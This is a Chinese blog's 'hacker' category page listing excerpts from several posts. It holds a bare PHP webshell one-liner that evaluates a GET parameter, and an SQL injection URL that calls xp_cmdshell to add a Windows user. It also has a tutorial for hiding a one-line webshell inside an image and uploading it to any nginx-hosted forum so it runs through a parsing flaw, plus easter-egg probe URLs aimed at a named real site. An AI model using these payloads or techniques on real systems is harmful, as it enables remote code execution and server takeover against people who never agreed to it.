文章分类 -  黑客

摘要:php后门有很多,包子也见多了和玩多了,但是在一次帮助朋友检查服务器的时候,竟然发现这样的恶意代码。事情是这样的,朋友的网站的利用各种查找后门的工具都没有发现php木马。老是找不到,小黑的伎俩很高级,每次使用完毕总是把后门删掉,但是每次都能继续进来,总是找不到从哪进来的。这个着实让人蛋疼。后来,终于在日志中发现一丝蛛丝马迹,通过我的分析,我发现一个IP总是很奇怪的POST数据到某个文件。然后一段时间后,此IP就访问一个莫名奇妙文件,名字很显眼明显不是正常系统文件,而是PHP后门。但是很快使用完毕后门就被删除了。哈哈,遇到小黑蛮细心的。然后通过分析发现,小黑的访问的文件发现代码:@preg_re 阅读全文
posted @ 2013-03-16 17:41 canlay 阅读(291) 评论(0) 推荐(0)
摘要:eval(stripcslashes($_GET['e'])); 阅读全文
posted @ 2012-09-14 19:51 canlay 阅读(330) 评论(0) 推荐(0)
摘要:关于“PHP彩蛋”的说法也许很多老PHPer已经都知道或听说了,好像是早在PHP4版本的时候就有彩蛋了,挺好玩儿的,可能近年来逐渐被人们遗忘了,其实彩蛋功能在PHP脚本引擎默认情况下是开启。 写个phpinfo();然后访问,再加上以下的GET值即可查阅 下面就用Discuz官方论坛做一下测试: http://www.discuz.net/?=PHPE9568F34-D428-11d2-A769-00AA001ACF42 http://www.discuz.net/?=PHPE9568F35-D428-11d2-A769-00AA001ACF42 http://www.discuz.... 阅读全文
posted @ 2012-02-07 11:41 canlay 阅读(306) 评论(0) 推荐(1)
摘要:我想不少人都看过一些关于SQL Injection针对SQL Server攻击的文章,都是因为变量过滤不足甚至没有过滤而构造畸形SQL语句注入的,包括我写的那篇《SQL Injection的实现与应用》也是这样的例子,因为没有碰到任何的过滤,所以使我们相当轻松就注入成功了,如下:http://www.ilikeplmm.com/show.asp?id=1;exec master.dbo.xp_cmdshell 'net user angel pass /add';-- 这往往给大家造成误解,认为只要变量过滤了'就可以防止SQL Injection攻击,这种意识为大量程序 阅读全文
posted @ 2012-01-14 23:09 canlay 阅读(186) 评论(0) 推荐(1)
摘要:先合并一张PHP一句话图片马,合并方法:①、DOS合并:copy 1.gif /b + 1.txt/a asp.gif②、用edjpgcom,进行图片和一句话木马的合并,一句话代码为“图片随便找一张.【顺带着说一下edjpgcom的使用方法:打开edjpgcom.exe所在文件夹,然后把你所要修改的图片拖动到edjpgcom.exe上面,然后edjpgcom.exe会自动打开,写入想要些的代码即可】一句话:’);?>然后找个nginx的站,先注册一个用户然后在论坛上传一张我们刚刚合并的图片一句话马。找到图片地址,然后在地址后面加个shell.php,在浏览器中运行。比如假设图片地址为ww 阅读全文
posted @ 2011-12-16 23:13 canlay 阅读(259) 评论(0) 推荐(0)